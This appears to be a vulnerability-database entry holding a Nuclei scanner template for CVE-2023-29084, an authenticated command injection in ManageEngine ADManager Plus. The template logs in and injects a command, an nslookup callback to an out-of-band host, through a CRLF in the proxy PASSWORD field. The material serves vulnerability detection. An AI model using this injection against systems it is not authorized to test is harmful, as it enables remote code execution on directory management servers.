ManageEngine ADManager Plus - Command Injection

2023-04-1810:03:47

ProjectDiscovery

github.com

zohocorp

manageengine_admanager_plus

cve2023

packetstorm

rce

oast

authenticated

command injection

remote code execution

unauthorized access

sensitive information

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

0.335 Low

EPSS

Percentile

97.1%

JSON

Zoho ManageEngine ADManager Plus through 7180 allows for authenticated users to exploit command injection via Proxy settings.

id: CVE-2023-29084

info:
  name: ManageEngine ADManager Plus - Command Injection
  author: rootxharsh,iamnoooob,pdresearch
  severity: high
  description: |
    Zoho ManageEngine ADManager Plus through 7180 allows for authenticated users to exploit command injection via Proxy settings.
  impact: |
    Successful exploitation of this vulnerability could lead to remote code execution, unauthorized access to sensitive information, or complete compromise of the target system.
  remediation: |
    Apply the latest security patch or update provided by the vendor to fix the command injection vulnerability in ManageEngine ADManager Plus.
  reference:
    - https://hnd3884.github.io/posts/CVE-2023-29084-Command-injection-in-ManageEngine-ADManager-plus/
    - https://community.grafana.com/t/release-notes-v6-3-x/19202
    - http://packetstormsecurity.com/files/172755/ManageEngine-ADManager-Plus-Command-Injection.html
    - https://manageengine.com
    - https://www.manageengine.com/products/ad-manager/admanager-kb/cve-2023-29084.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2023-29084
    cwe-id: CWE-77
    epss-score: 0.37079
    epss-percentile: 0.97178
    cpe: cpe:2.3:a:zohocorp:manageengine_admanager_plus:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: zohocorp
    product: manageengine_admanager_plus
  tags: cve,cve2023,packetstorm,manageengine,admanager,rce,oast,authenticated,zohocorp
variables:
  cmd: "nslookup.exe {{interactsh-url}} 1.1.1.1"

http:
  - raw:
      - |
        POST /j_security_check HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded

        is_admp_pass_encrypted=false&j_username={{username}}&j_password={{password}}&domainName=ADManager+Plus+Authentication&AUTHRULE_NAME=ADAuthenticator
      - |
        GET /home.do HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /api/json/admin/saveServerSettings HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}

        params=[{"tabId":"proxy","ENABLE_PROXY":true,"SERVER_NAME":"1.1.1.1","USER_NAME":"random","PASSWORD":"asd\r\n{{cmd}}","PORT":"80"}]&admpcsrf={{admpcsrf}}

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"message":"'
          - 'Proxy Settings'
        condition: and

      - type: word
        part: interactsh_protocol
        words:
          - "dns"

    extractors:
      - type: kval
        name: admpcsrf
        internal: true
        kval:
          - admpcsrf
        part: header
# digest: 490a0046304402203b40c67a84b05f52a1cc250c89d9d44375d1a0c33d9f1bc54e9d63819b04e2e00220698ec8d0a6e93ac02207ffb5042b97f54896736e55568b992c616c8dc5924bb5:922c64590222798bb761d5b6d8e72950